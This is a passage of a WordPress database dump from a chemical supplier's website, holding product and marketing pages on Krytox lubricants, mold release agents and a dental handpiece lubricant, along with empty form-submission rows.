rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High-Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best a temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high-temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nRecently we have added the new FPG series to the Krytox line offering. <a href="https://www.miller-stephenson.com/krytox-fpg-028-performance-lubricant/">FPG 028</a> was designed for use in aircraft and supporting equipment. Krytox™ FPG 028 is MIL-PRF-27617 TYPE IV specified and has AFPET/PTPT approval. It is resistant to hydrocarbon fuel, liquid oxygen and a variety of other chemicals. FPG 028 operates well under severe conditions and can be used for bearings and gears, and as a lubricant for O-rings and elastomers. The other FPG product, <a href="https://www.miller-stephenson.com/krytox-fpg-182-performance-lubricant/">the FPG 182</a> was designed for clean rooms, robotics, and electronic manufacturing. FPG 182 can be used for bearings, gears, and as a lubricant for O-rings and elastomers. It offers exceptional resistance to oxygen and chemicals and prevents corrosion.\r\n\r\nTo learn more about food grade applications <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">click here.</a>\r\n\r\nFor Automotive solutions <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">click here.</a>\r\n\r\nKrytox <a href="https://www.miller-stephenson.com/krytox-faq/">FAQ.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/mil-prf-27617-greases/">MIL PRF 27617 Greases</a>\r\n\r\n&nbsp;\r\n\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n<span style="font-size: 75%;">These products can also be found on <a href="https://www.grainger.com/product/KRYTOX-Multipurpose-Greases-WP6806244/_/N-1181Z1z0qq26/Ntt-krytox?_=1479826888398&amp;sst=subsetTest&amp;ts_optout=true&amp;s_pp=false&amp;picUrl=//static.grainger.com/rp/s/is/image/Grainger/35RR24_AS02?$smthumb$">Grainger.</a></span>\r\n\r\n<span style="font-size: 75%;">Krytox™ is  a trademark of The Chemours Company FC, LLC.</span>\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-11-22 20:31:01', '2016-11-22 20:31:01', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3104, 0, '2016-11-22 20:35:40', '2016-11-22 20:35:40', '', '', '', 'publish', 'closed', 'closed', '', '3104', '', '', '2016-11-22 20:35:40', '2016-11-22 20:35:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/3104/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3105, 0, '2016-11-23 00:31:07', '2016-11-23 00:31:07', '', '', '', 'publish', 'closed', 'closed', '', '3105', '', '', '2016-11-23 00:31:07', '2016-11-23 00:31:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/3105/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3106, 0, '2016-11-23 06:50:13', '2016-11-23 06:50:13', '', '', '', 'publish', 'closed', 'closed', '', '3106', '', '', '2016-11-23 06:50:13', '2016-11-23 06:50:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/3106/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3107, 0, '2016-11-23 11:55:50', '2016-11-23 11:55:50', '', '', '', 'publish', 'closed', 'closed', '', '3107', '', '', '2016-11-23 11:55:50', '2016-11-23 11:55:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/3107/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3108, 0, '2016-11-23 12:27:54', '2016-11-23 12:27:54', '', '', '', 'publish', 'closed', 'closed', '', '3108', '', '', '2016-11-23 12:27:55', '2016-11-23 12:27:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/3108/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3109, 0, '2016-11-23 15:46:20', '2016-11-23 15:46:20', '', '', '', 'publish', 'closed', 'closed', '', '3109', '', '', '2016-11-23 15:46:20', '2016-11-23 15:46:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/3109/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3110, 0, '2016-11-23 15:57:12', '2016-11-23 15:57:12', '', '', '', 'publish', 'closed', 'closed', '', '3110', '', '', '2016-11-23 15:57:12', '2016-11-23 15:57:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/3110/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3111, 0, '2016-11-23 16:12:34', '2016-11-23 16:12:34', '', '', '', 'publish', 'closed', 'closed', '', '3111', '', '', '2016-11-23 16:12:34', '2016-11-23 16:12:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/3111/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3112, 3, '2016-11-23 16:50:16', '2016-11-23 16:50:16', '<h3>Mold Release Agent: Which is right for you?</h3>\r\nMold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agent are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason, manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release agent solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane based release agents. Our company is 100% back-integrated meaning our manufacturing, inventory, and quality are maintained regardless of flucuations in the market.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Dry Film Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform dry, thin films that exhibit excellent surface adhesion and durability. Miller-Stephenson PTFE release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. Our PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">Thermoset polysiloxanes</a> (ReleaSys)</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agent, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n 	<li><strong><a href="https://en.wikipedia.org/wiki/Release_agent">Understanding Release Agents</a></strong></li>\r\n</ul>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-11-23 16:50:16', '2016-11-23 16:50:16', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3113, 188, '2016-11-23 16:59:28', '2016-11-23 16:59:28', '', '', '', 'publish', 'closed', 'closed', '', '3113', '', '', '2016-11-23 16:59:28', '2016-11-23 16:59:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/3113/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3114, 3, '2016-11-23 18:32:31', '2016-11-23 18:32:31', '<h3>Mold Release Agent: Which is right for you?</h3>\r\nMold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agent are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason, manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release agent solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane based release agents. Our company is 100% back-integrated meaning our manufacturing, inventory, and quality are maintained regardless of flucuations in the market.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Dry Film Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform dry, thin films that exhibit excellent surface adhesion and durability. Miller-Stephenson PTFE release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.\r\n\r\nProduction engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. Our PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">Thermoset polysiloxanes</a> (ReleaSys)</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agent, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.\r\n\r\nMiller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n 	<li><strong><a href="https://en.wikipedia.org/wiki/Release_agent">Understanding Release Agents</a></strong></li>\r\n</ul>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-11-23 18:32:31', '2016-11-23 18:32:31', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3115, 3, '2016-11-23 19:18:50', '2016-11-23 19:18:50', 'Miller-Stephenson MS-122XD is a PTFE Dry-Film Lubricant / Release Agent that contain a suspension of low molecular weight polytetrafluoroethylene (PTFE) fluoropolymers – white,waxy particles of PTFE in an easy to apply form. The outstanding lubricity and low coefficient of friction of PTFE is perfect for use as a dry film lubricant and as a release agent in molding operations. MS-122XD and MS-143XD are excellent release agents with the added advantage of superior release action in the initial cycles. They work well for all applications. As a dry lubricant, they are a very good general purpose lubricant, which produces a uniform coating, good surface adhesion and minimization of mechanical wear..\n\n<strong>Release Agent Applications</strong>\n\nMS-122XD can be used to release the following materials with virtually no transfer of the release agent:\n<table style="height: 138px;" width="478">\n<tbody>\n<tr>\n<td width="140">•          Plastics</td>\n<td width="168">•          Rubbers</td>\n</tr>\n<tr>\n<td width="140">•          Resins</td>\n<td width="168">•          Phenolics</td>\n</tr>\n<tr>\n<td width="140">•          Acrylics</td>\n<td width="168">•          Polycarbonates</td>\n</tr>\n<tr>\n<td width="140">•          Urethanes</td>\n<td width="168">•          Polystyrene</td>\n</tr>\n<tr>\n<td width="140">•          Nylons</td>\n<td width="168">•          Elastomers</td>\n</tr>\n</tbody>\n</table>\n<h3><strong>\nPTFE Dry-Film Lubricant Applications</strong></h3>\nAs a dry lubricant, MS-122XD is applicable on a variety of materials and will afford unmatched lubricity and wear resistance.  These materials include:\n<table style="height: 155px;" width="458">\n<tbody>\n<tr>\n<td width="140">•          Metal</td>\n<td width="168">•          Ceramics</td>\n</tr>\n<tr>\n<td width="140">•          Glass</td>\n<td width="168">•          Elastomers</td>\n</tr>\n<tr>\n<td width="140">•          Rubber</td>\n<td width="168">•          Polycarbonates</td>\n</tr>\n<tr>\n<td width="140">•          Wood</td>\n<td width="168">•          Elastomers</td>\n</tr>\n</tbody>\n</table>\nMiller-Stephenson offers a selection of specialized formulations which provide high performance solutions for your molding process.  The MS-122 Series will deliver higher productivity, lower rejection rates, and higher quality products.  Please use the selection guide below to help direct you to the appropriate product.', 'MS-122XD', '<strong>As a Release Agent: </strong>An excellent release agent with the added advantage of superior release action in the initial cycles. Works well for all applications. Produces a uniform coating.\n\n<strong>As a Dry Lubricant: </strong>A very good general purpose dry lubricant for all applications. Produces a uniform coating.', 'inherit', 'closed', 'closed', '', '1681-autosave-v1', '', '', '2016-11-23 19:18:50', '2016-11-23 19:18:50', '', 1681, 'https://www.miller-stephenson.com/1681-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3116, 0, '2016-11-23 20:28:31', '2016-11-23 20:28:31', '', '', '', 'publish', 'closed', 'closed', '', '3116', '', '', '2016-11-23 20:28:32', '2016-11-23 20:28:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/3116/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3117, 189, '2016-11-24 01:17:14', '2016-11-24 01:17:14', '', '', '', 'publish', 'closed', 'closed', '', '3117', '', '', '2016-11-24 01:17:14', '2016-11-24 01:17:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/3117/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3118, 3, '2016-11-24 03:10:49', '2016-11-24 03:10:49', '<h3><span style="font-size: 120%;"><strong>Dental Handpiece Lubricant</strong></span></h3>\r\nFew medical applications challenge a bearing lubricant more than high-<wbr />speed dental handpieces.  Rotating at speeds of excess of 500,000 rotations per minute (RPM), these handpieces require advanced lubrication which can not only maintain excellent thin-<wbr />film strength, but also do not degrade under the immense mechanical and thermal stresses which occur within these handpieces turbines. FluoroExtreme is the perfect match for your dental handpiece lubricant.\r\n\r\nPictured above is a head-<wbr />to-<wbr />head evaluation of a popular handpiece lubricant versus Miller-<wbr />Stephenson’s FluoroExtreme™ . The handpieces were cleaned and lubricated, then challenged with 3 hours of continuous use at the recommended operating air pressure / rpm. The handpieces were then disassembled and evaluated for wear and deposit formation. The Industry Standard lubricant suffered from significant breakdown resulting in degradation of the o-<wbr />rings, wore impellers and the lubricant itself, resulting in large deposit formation and a very noticeable increase in audible noise during 